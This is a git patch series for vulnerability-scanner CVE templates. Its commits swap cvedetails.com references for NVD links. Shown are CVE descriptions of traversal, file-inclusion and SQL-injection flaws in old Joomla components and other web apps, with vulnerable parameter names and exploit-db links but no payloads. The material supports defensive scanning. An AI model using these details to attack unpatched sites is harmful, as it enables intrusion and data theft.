+ - https://nvd.nist.gov/vuln/detail/CVE-2010-2122 - https://www.exploit-db.com/exploits/12618 - http://web.archive.org/web/20210624180854/https://www.securityfocus.com/bid/40192 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-2128.yaml b/cves/2010/CVE-2010-2128.yaml index 70510e8ed0..9d2fccfb27 100644 --- a/cves/2010/CVE-2010-2128.yaml +++ b/cves/2010/CVE-2010-2128.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12607 - - https://www.cvedetails.com/cve/CVE-2010-2128 + - https://nvd.nist.gov/vuln/detail/CVE-2010-2128 - http://web.archive.org/web/20140801195113/http://secunia.com/advisories/39832/ - http://www.exploit-db.com/exploits/12607 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-2259.yaml b/cves/2010/CVE-2010-2259.yaml index 97477fcdd8..5906ead11f 100644 --- a/cves/2010/CVE-2010-2259.yaml +++ b/cves/2010/CVE-2010-2259.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/10946 - - https://www.cvedetails.com/cve/CVE-2010-2259 + - https://nvd.nist.gov/vuln/detail/CVE-2010-2259 - http://web.archive.org/web/20140724121430/http://secunia.com/advisories/37866/ - http://www.exploit-db.com/exploits/10946 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-2507.yaml b/cves/2010/CVE-2010-2507.yaml index 9295c9f8a8..aa66a9e1a9 100644 --- a/cves/2010/CVE-2010-2507.yaml +++ b/cves/2010/CVE-2010-2507.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/13981 - - https://www.cvedetails.com/cve/CVE-2010-2507 + - https://nvd.nist.gov/vuln/detail/CVE-2010-2507 - http://web.archive.org/web/20140805070317/http://secunia.com/advisories/40297/ - http://packetstormsecurity.org/1006-exploits/joomlapicasa2gallery-lfi.txt remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-2680.yaml b/cves/2010/CVE-2010-2680.yaml index efd570ebde..f56616dc74 100644 --- a/cves/2010/CVE-2010-2680.yaml +++ b/cves/2010/CVE-2010-2680.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/14064 - - https://www.cvedetails.com/cve/CVE-2010-2680 + - https://nvd.nist.gov/vuln/detail/CVE-2010-2680 - http://packetstormsecurity.org/1006-exploits/joomlajesectionfinder-lfi.txt - http://web.archive.org/web/20210121201853/https://www.securityfocus.com/bid/41163/ remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-2682.yaml b/cves/2010/CVE-2010-2682.yaml index 220e7b6f0b..315c8e1913 100644 --- a/cves/2010/CVE-2010-2682.yaml +++ b/cves/2010/CVE-2010-2682.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/14017 - - https://www.cvedetails.com/cve/CVE-2010-2682 + - https://nvd.nist.gov/vuln/detail/CVE-2010-2682 - http://packetstormsecurity.org/1004-exploits/joomlarealtyna-lfi.txt - http://www.exploit-db.com/exploits/14017 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-2857.yaml b/cves/2010/CVE-2010-2857.yaml index 8a3d4029c1..90ee7cb7d3 100644 --- a/cves/2010/CVE-2010-2857.yaml +++ b/cves/2010/CVE-2010-2857.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the cid parameter to album.html. reference: - https://www.exploit-db.com/exploits/14274 - - https://www.cvedetails.com/cve/CVE-2010-2857 + - https://nvd.nist.gov/vuln/detail/CVE-2010-2857 - http://web.archive.org/web/20210121202225/https://www.securityfocus.com/bid/41485/ - http://www.exploit-db.com/exploits/14274 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-2918.yaml b/cves/2010/CVE-2010-2918.yaml index 4f7592f7c1..950f915aa2 100644 --- a/cves/2010/CVE-2010-2918.yaml +++ b/cves/2010/CVE-2010-2918.yaml @@ -7,7 +7,7 @@ info: description: A PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. reference: - https://www.exploit-db.com/exploits/31708 - - https://www.cvedetails.com/cve/CVE-2010-2918 + - https://nvd.nist.gov/vuln/detail/CVE-2010-2918 - http://web.archive.org/web/20210127190100/https://www.securityfocus.com/bid/28942/ - https://www.exploit-db.com/exploits/14476 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-2920.yaml b/cves/2010/CVE-2010-2920.yaml index 6b9e2f8d92..8de335fd3b 100644 --- a/cves/2010/CVE-2010-2920.yaml +++ b/cves/2010/CVE-2010-2920.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12120 - - https://www.cvedetails.com/cve/CVE-2010-2920 + - https://nvd.nist.gov/vuln/detail/CVE-2010-2920 - http://www.vupen.com/english/advisories/2010/1844 remediation: Upgrade to a supported version. classification: diff --git a/cves/2010/CVE-2010-3203.yaml b/cves/2010/CVE-2010-3203.yaml index 4f52723a40..5db4a9b6c0 100644 --- a/cves/2010/CVE-2010-3203.yaml +++ b/cves/2010/CVE-2010-3203.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php. reference: - https://www.exploit-db.com/exploits/14845 - - https://www.cvedetails.com/cve/CVE-2010-3203 + - https://nvd.nist.gov/vuln/detail/CVE-2010-3203 - http://web.archive.org/web/20150105095919/http://secunia.com:80/advisories/41187/ - http://www.exploit-db.com/exploits/14845 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-3426.yaml b/cves/2010/CVE-2010-3426.yaml index ca28b72246..0040768b6f 100644 --- a/cves/2010/CVE-2010-3426.yaml +++ b/cves/2010/CVE-2010-3426.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/14964 - - https://www.cvedetails.com/cve/CVE-2010-3426 + - https://nvd.nist.gov/vuln/detail/CVE-2010-3426 - http://packetstormsecurity.org/1009-exploits/joomlajphone-lfi.txt - http://www.exploit-db.com/exploits/14964 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-4282.yaml b/cves/2010/CVE-2010-4282.yaml index 4e19e82b8b..6a4fe5cc74 100644 --- a/cves/2010/CVE-2010-4282.yaml +++ b/cves/2010/CVE-2010-4282.yaml @@ -7,7 +7,7 @@ info: description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php. reference: - https://www.exploit-db.com/exploits/15643 - - https://www.cvedetails.com/cve/CVE-2010-4282 + - https://nvd.nist.gov/vuln/detail/CVE-2010-4282 - http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download - http://www.exploit-db.com/exploits/15643 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-4617.yaml b/cves/2010/CVE-2010-4617.yaml index 36464505b2..0f180b424f 100644 --- a/cves/2010/CVE-2010-4617.yaml +++ b/cves/2010/CVE-2010-4617.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. reference: - https://www.exploit-db.com/exploits/15791 - - https://www.cvedetails.com/cve/CVE-2010-4617 + - https://nvd.nist.gov/vuln/detail/CVE-2010-4617 - http://packetstormsecurity.org/files/view/96812/joomlajotloader-lfi.txt remediation: Upgrade to a supported version. classification: diff --git a/cves/2010/CVE-2010-4719.yaml b/cves/2010/CVE-2010-4719.yaml index 0e3cfa2a1e..1608855411 100644 --- a/cves/2010/CVE-2010-4719.yaml +++ b/cves/2010/CVE-2010-4719.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/15749 - - https://www.cvedetails.com/cve/CVE-2010-4719 + - https://nvd.nist.gov/vuln/detail/CVE-2010-4719 - http://packetstormsecurity.org/files/view/96751/joomlajradio-lfi.txt - http://www.exploit-db.com/exploits/15749 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-4769.yaml b/cves/2010/CVE-2010-4769.yaml index 247d5b55f4..6db0e8c3c3 100644 --- a/cves/2010/CVE-2010-4769.yaml +++ b/cves/2010/CVE-2010-4769.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly unspecified other impacts via a .. (dot dot) in the task parameter to index.php. reference: - https://www.exploit-db.com/exploits/15585 - - https://www.cvedetails.com/cve/CVE-2010-4769 + - https://nvd.nist.gov/vuln/detail/CVE-2010-4769 - http://web.archive.org/web/20140803011658/http://secunia.com/advisories/42324/ - http://web.archive.org/web/20210121210048/https://www.securityfocus.com/bid/44992/ remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-4977.yaml b/cves/2010/CVE-2010-4977.yaml index 1da134d5db..9d7b3c3415 100644 --- a/cves/2010/CVE-2010-4977.yaml +++ b/cves/2010/CVE-2010-4977.yaml @@ -7,7 +7,7 @@ info: description: A SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php. reference: - https://www.exploit-db.com/exploits/34250 - - https://www.cvedetails.com/cve/CVE-2010-4977 + - https://nvd.nist.gov/vuln/detail/CVE-2010-4977 - http://www.salvatorefresta.net/files/adv/Canteen%20Joomla%20Component%201.0%20Multiple%20Remote%20Vulnerabilities-04072010.txt - http://packetstormsecurity.org/1007-exploits/joomlacanteen-lfisql.txt remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-5028.yaml b/cves/2010/CVE-2010-5028.yaml index 89303e05b2..03e16403ef 100644 --- a/cves/2010/CVE-2010-5028.yaml +++ b/cves/2010/CVE-2010-5028.yaml @@ -7,7 +7,7 @@ info: description: A SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php. reference: - https://www.exploit-db.com/exploits/12601 - - https://www.cvedetails.com/cve/CVE-2010-5028 + - https://nvd.nist.gov/vuln/detail/CVE-2010-5028 - http://www.vupen.com/english/advisories/2010/1269 - http://web.archive.org/web/20210126225410/https://www.securityfocus.com/bid/40193/ remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-5278.yaml b/cves/2010/CVE-2010-5278.yaml index 0c0531670c..12f409d850 100644 --- a/cves/2010/CVE-2010-5278.yaml +++ b/cves/2010/CVE-2010-5278.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter when magic_quotes_gpc is disabled. reference: - https://www.exploit-db.com/exploits/34788 - - https://www.cvedetails.com/cve/CVE-2010-5278 + - https://nvd.nist.gov/vuln/detail/CVE-2010-5278 - http://packetstormsecurity.org/1009-exploits/modx202pl-lfi.txt - http://web.archive.org/web/20140803154716/http://secunia.com/advisories/41638/ classification: diff --git a/cves/2010/CVE-2010-5286.yaml b/cves/2010/CVE-2010-5286.yaml index e5ee8dd902..299690266b 100644 --- a/cves/2010/CVE-2010-5286.yaml +++ b/cves/2010/CVE-2010-5286.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/34837 - - https://www.cvedetails.com/cve/CVE-2010-5286 + - https://nvd.nist.gov/vuln/detail/CVE-2010-5286 - http://web.archive.org/web/20210123122507/https://www.securityfocus.com/bid/44053/ - http://packetstormsecurity.org/1010-exploits/joomlajstore-lfi.txt remediation: Upgrade to a supported version. diff --git a/cves/2012/CVE-2012-0981.yaml b/cves/2012/CVE-2012-0981.yaml index abd78bb082..b345d55ca9 100644 --- a/cves/2012/CVE-2012-0981.yaml +++ b/cves/2012/CVE-2012-0981.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php. reference: - https://www.exploit-db.com/exploits/18435 - - https://www.cvedetails.com/cve/CVE-2012-0981 + - https://nvd.nist.gov/vuln/detail/CVE-2012-0981 - http://web.archive.org/web/20151016200610/http://secunia.com/advisories/47802/ - http://www.exploit-db.com/exploits/18435 classification: diff --git a/cves/2012/CVE-2012-0991.yaml b/cves/2012/CVE-2012-0991.yaml index 3d6345a868..5c0ef7ee15 100644 --- a/cves/2012/CVE-2012-0991.yaml +++ b/cves/2012/CVE-2012-0991.yaml @@ -7,7 +7,7 @@ info: description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter. reference: - https://www.exploit-db.com/exploits/36650 - - https://www.cvedetails.com/cve/CVE-2012-0991 + - https://nvd.nist.gov/vuln/detail/CVE-2012-0991 - http://web.archive.org/web/20210121221715/https://www.securityfocus.com/bid/51788/ - http://www.open-emr.org/wiki/index.php/OpenEMR_Patches classification: diff --git a/cves/2012/CVE-2012-0996.yaml b/cves/2012/CVE-2012-0996.yaml index 50bf5aa1a6..b99e2ab43a 100644 --- a/cves/2012/CVE-2012-0996.yaml +++ b/cves/2012/CVE-2012-0996.yaml @@ -7,7 +7,7 @@ info: description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php. reference: - https://www.exploit-db.com/exploits/36784 - - https://www.cvedetails.com/cve/CVE-2012-0996 + - https://nvd.nist.gov/vuln/detail/CVE-2012-0996 - https://www.htbridge.ch/advisory/HTB23071 remediation: Upgrade to a supported version. classification: diff --git a/cves/2012/CVE-2012-1226.yaml b/cves/2012/CVE-2012-1226.yaml index b0edd8260f..a4d26467dd 100644 --- a/cves/2012/CVE-2012-1226.yaml +++ b/cves/2012/CVE-2012-1226.yaml @@ -7,7 +7,7 @@ info: description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php. reference: - https://www.exploit-db.com/exploits/36873 - - https://www.cvedetails.com/cve/CVE-2012-1226 + - https://nvd.nist.gov/vuln/detail/CVE-2012-1226 - http://web.archive.org/web/20210508221434/https://www.securityfocus.com/archive/1/521583 - http://www.vulnerability-lab.com/get_content.php?id=428 remediation: Upgrade to a supported version. diff --git a/cves/2012/CVE-2012-4253.yaml b/cves/2012/CVE-2012-4253.yaml index c2b2313f25..3b866d5e4d 100644 --- a/cves/2012/CVE-2012-4253.yaml +++ b/cves/2012/CVE-2012-4253.yaml @@ -7,7 +7,7 @@ info: description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php. reference: - https://www.exploit-db.com/exploits/37129 - - https://www.cvedetails.com/cve/CVE-2012-4253 + - https://nvd.nist.gov/vuln/detail/CVE-2012-4253 - http://packetstormsecurity.org/files/112304/MySQLDumper-1.24.4-LFI-XSS-CSRF-Code-Execution-Traversal.html - https://exchange.xforce.ibmcloud.com/vulnerabilities/75286 classification: diff --git a/cves/2012/CVE-2012-4878.yaml b/cves/2012/CVE-2012-4878.yaml index b4dcf437f8..a71ad764ac 100644 --- a/cves/2012/CVE-2012-4878.yaml +++ b/cves/2012/CVE-2012-4878.yaml @@ -7,7 +7,7 @@ info: description: A path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action. reference: - https://www.exploit-db.com/exploits/37034 - - https://www.cvedetails.com/cve/CVE-2012-4878 + - https://nvd.nist.gov/vuln/detail/CVE-2012-4878 - http://www.vulnerability-lab.com/get_content.php?id=487 - http://packetstormsecurity.org/files/111473/Flatnux-CMS-2011-08.09.2-CSRF-XSS-Directory-Traversal.html classification: diff --git a/cves/2015/CVE-2015-4074.yaml b/cves/2015/CVE-2015-4074.yaml index 01735983ba..7087d567e3 100644 --- a/cves/2015/CVE-2015-4074.yaml +++ b/cves/2015/CVE-2015-4074.yaml @@ -8,7 +8,7 @@ info: reference: - https://packetstormsecurity.com/files/132766/Joomla-Helpdesk-Pro-XSS-File-Disclosure-SQL-Injection.html - https://www.exploit-db.com/exploits/37666/ - - https://www.cvedetails.com/cve/CVE-2015-4074 + - https://nvd.nist.gov/vuln/detail/CVE-2015-4074 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4074 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N diff --git a/cves/2015/CVE-2015-4632.yaml b/cves/2015/CVE-2015-4632.yaml index e0c29e86de..b11616cf2f 100644 --- a/cves/2015/CVE-2015-4632.yaml +++ b/cves/2015/CVE-2015-4632.yaml @@ -7,7 +7,7 @@ info: description: Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search. reference: - https://www.exploit-db.com/exploits/37388 - - https://www.cvedetails.com/cve/CVE-2015-4632 + - https://nvd.nist.gov/vuln/detail/CVE-2015-4632 - https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N diff --git a/cves/2017/CVE-2017-9833.yaml b/cves/2017/CVE-2017-9833.yaml index 19a4b7a139..692fca4313 100644 --- a/cves/2017/CVE-2017-9833.yaml +++ b/cves/2017/CVE-2017-9833.yaml @@ -7,7 +7,7 @@ info: description: BOA Web Server 0.94.14 is susceptible to arbitrary file access. The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges and without using access credentials. reference: - https://www.exploit-db.com/exploits/42290 - - https://www.cvedetails.com/cve/CVE-2017-9833 + - https://nvd.nist.gov/vuln/detail/CVE-2017-9833 - https://pastebin.com/raw/rt7LJvyF - https://www.exploit-db.com/exploits/42290/ classification: diff --git a/cves/2018/CVE-2018-10201.yaml b/cves/2018/CVE-2018-10201.yaml index 9cd2c826a6..21805292ab 100644 --- a/cves/2018/CVE-2018-10201.yaml +++ b/cves/2018/CVE-2018-10201.yaml @@ -7,7 +7,7 @@ info: description: Ncomputing vSpace Pro versions 10 and 11 suffer from a directory traversal vulnerability. reference: - https://packetstormsecurity.com/files/147303/Ncomputing-vSPace-Pro-10-11-Directory-Traversal.html - - https://www.cvedetails.com/cve/CVE-2018-10201 + - https://nvd.nist.gov/vuln/detail/CVE-2018-10201 - http://www.kwell.net/kwell_blog/?p=5199 - https://www.kwell.net/kwell/index.php?option=com_newsfeeds&view=newsfeed&id=15&Itemid=173&lang=es classification: diff --git a/cves/2018/CVE-2018-19365.yaml b/cves/2018/CVE-2018-19365.yaml index c84cf477f4..d2b13cc14b 100644 --- a/cves/2018/CVE-2018-19365.yaml +++ b/cves/2018/CVE-2018-19365.yaml @@ -7,7 +7,7 @@ info: description: Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API. reference: - https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html - - https://www.cvedetails.com/cve/CVE-2018-19365 + - https://nvd.nist.gov/vuln/detail/CVE-2018-19365 - https://raw.githubusercontent.com/WowzaMediaSystems/public_cve/main/wowza-streaming-engine/CVE-2018-19365.txt classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H diff --git a/cves/2022/CVE-2022-24900.yaml b/cves/2022/CVE-2022-24900.yaml index f5a13dc7a6..f585c7af50 100644 --- a/cves/2022/CVE-2022-24900.yaml +++ b/cves/2022/CVE-2022-24900.yaml @@ -9,7 +9,7 @@ info: reference: - https://github.com/onlaj/Piano-LED-Visualizer/issues/350 - https://vuldb.com/?id.198714 - - https://www.cvedetails.com/cve/CVE-2022-24900/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-24900 - https://github.com/onlaj/Piano-LED-Visualizer/commit/3f10602323cd8184e1c69a76b815655597bf0ee5 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N From f40ef458b0fb2fdbf1c42eb1ed82e633a3e7bbba Mon Sep 17 00:00:00 2001 From: sullo <sullo@cirt.net> Date: Thu, 2 Mar 2023 17:27:36 -0500 Subject: [PATCH 59/84] Remove cvedetails.com links where nist link already existed --- cves/2007/CVE-2007-4504.yaml | 1 - cves/2008/CVE-2008-4668.yaml | 1 - cves/2008/CVE-2008-4764.yaml | 1 - cves/2008/CVE-2008-6080.yaml | 1 - cves/2008/CVE-2008-6222.yaml | 1 - cves/2009/CVE-2009-2015.yaml | 1 - cves/2009/CVE-2009-2100.yaml | 1 - cves/2009/CVE-2009-3053.yaml | 1 - cves/2009/CVE-2009-3318.yaml | 1 - cves/2009/CVE-2009-4679.yaml | 1 - cves/2015/CVE-2015-7780.yaml | 1 - cves/2017/CVE-2017-1000163.yaml | 1 - cves/2017/CVE-2017-12138.yaml | 1 - cves/2017/CVE-2017-15363.yaml | 1 - cves/2017/CVE-2017-15647.yaml | 1 - cves/2017/CVE-2017-5521.yaml | 1 - cves/2018/CVE-2018-17422.yaml | 1 - cves/2018/CVE-2018-6200.yaml | 1 - cves/2018/CVE-2018-7719.yaml | 1 - cves/2019/CVE-2019-3912.yaml | 1 - cves/2019/CVE-2019-9915.yaml | 1 - cves/2019/CVE-2019-9922.yaml | 1 - cves/2020/CVE-2020-11455.yaml | 1 - cves/2020/CVE-2020-11529.yaml | 1 - cves/2020/CVE-2020-13121.yaml | 1 - cves/2020/CVE-2020-18268.yaml | 1 - cves/2020/CVE-2020-23015.yaml | 1 - cves/2020/CVE-2020-36365.yaml | 1 - cves/2022/CVE-2022-26233.yaml | 1 - 29 files changed, 29 deletions(-) diff --git a/cves/2007/CVE-2007-4504.yaml b/cves/2007/CVE-2007-4504.yaml index 98144c6f06..0d56342403 100644 --- a/cves/2007/CVE-2007-4504.yaml +++ b/cves/2007/CVE-2007-4504.yaml @@ -7,7 +7,6 @@ info: description: Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action. reference: - https://www.exploit-db.com/exploits/4307 - - https://www.cvedetails.com/cve/CVE-2007-4504 - https://exchange.xforce.ibmcloud.com/vulnerabilities/36222 - https://nvd.nist.gov/vuln/detail/CVE-2007-4504 classification: diff --git a/cves/2008/CVE-2008-4668.yaml b/cves/2008/CVE-2008-4668.yaml index 9a7dd52117..eb253a721b 100644 --- a/cves/2008/CVE-2008-4668.yaml +++ b/cves/2008/CVE-2008-4668.yaml @@ -7,7 +7,6 @@ info: description: Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php. reference: - https://www.exploit-db.com/exploits/6618 - - https://www.cvedetails.com/cve/CVE-2008-4668 - http://web.archive.org/web/20210121183742/https://www.securityfocus.com/bid/31458/ - http://securityreason.com/securityalert/4464 - https://nvd.nist.gov/vuln/detail/CVE-2008-4668 diff --git a/cves/2008/CVE-2008-4764.yaml b/cves/2008/CVE-2008-4764.yaml index 4b90a27a79..bf89b54924 100644 --- a/cves/2008/CVE-2008-4764.yaml +++ b/cves/2008/CVE-2008-4764.yaml @@ -7,7 +7,6 @@ info: description: Joomla! 2.0.0 RC2 and earlier are susceptible to local file inclusion in the eXtplorer module (com_extplorer) that allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action. reference: - https://www.exploit-db.com/exploits/5435 - - https://www.cvedetails.com/cve/CVE-2008-4764 - http://web.archive.org/web/20210121181347/https://www.securityfocus.com/bid/28764/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/41873 - https://nvd.nist.gov/vuln/detail/CVE-2008-4764 diff --git a/cves/2008/CVE-2008-6080.yaml b/cves/2008/CVE-2008-6080.yaml index 7a5240ac84..94f9d41869 100644 --- a/cves/2008/CVE-2008-6080.yaml +++ b/cves/2008/CVE-2008-6080.yaml @@ -7,7 +7,6 @@ info: description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. reference: - https://www.exploit-db.com/exploits/6809 - - https://www.cvedetails.com/cve/CVE-2008-6080 - http://web.archive.org/web/20140804231654/http://secunia.com/advisories/32377/ - http://web.archive.org/web/20210121184101/https://www.securityfocus.com/bid/31877/ - https://nvd.nist.gov/vuln/detail/CVE-2008-6080 diff --git a/cves/2008/CVE-2008-6222.yaml b/cves/2008/CVE-2008-6222.yaml index dd11e3ad7a..53d4cc3bcd 100644 --- a/cves/2008/CVE-2008-6222.yaml +++ b/cves/2008/CVE-2008-6222.yaml @@ -7,7 +7,6 @@ info: description: Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php. reference: - https://www.exploit-db.com/exploits/6980 - - https://www.cvedetails.com/cve/CVE-2008-6222 - http://web.archive.org/web/20111223225601/http://secunia.com/advisories/32523/ - http://web.archive.org/web/20210121184244/https://www.securityfocus.com/bid/32113/ - https://nvd.nist.gov/vuln/detail/CVE-2008-6222 diff --git a/cves/2009/CVE-2009-2015.yaml b/cves/2009/CVE-2009-2015.yaml index a474ff1b28..31e2f538cf 100644 --- a/cves/2009/CVE-2009-2015.yaml +++ b/cves/2009/CVE-2009-2015.yaml @@ -7,7 +7,6 @@ info: description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion). reference: - https://www.exploit-db.com/exploits/8898 - - https://www.cvedetails.com/cve/CVE-2009-2015 - http://web.archive.org/web/20210121191105/https://www.securityfocus.com/bid/35259/ - http://www.vupen.com/english/advisories/2009/1530 - https://nvd.nist.gov/vuln/detail/CVE-2009-2015 diff --git a/cves/2009/CVE-2009-2100.yaml b/cves/2009/CVE-2009-2100.yaml index 10d0f59046..970282f818 100644 --- a/cves/2009/CVE-2009-2100.yaml +++ b/cves/2009/CVE-2009-2100.yaml @@ -7,7 +7,6 @@ info: description: Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php. reference: - https://www.exploit-db.com/exploits/8946 - - https://www.cvedetails.com/cve/CVE-2009-2100 - http://web.archive.org/web/20210121191226/https://www.securityfocus.com/bid/35378/ - https://nvd.nist.gov/vuln/detail/CVE-2009-2100 diff --git a/cves/2009/CVE-2009-3053.yaml b/cves/2009/CVE-2009-3053.yaml index 2a5e91b46d..90938d124f 100644 --- a/cves/2009/CVE-2009-3053.yaml +++ b/cves/2009/CVE-2009-3053.yaml @@ -7,7 +7,6 @@ info: description: Joomla! Agora 3.0.0b (com_agora) allows remote 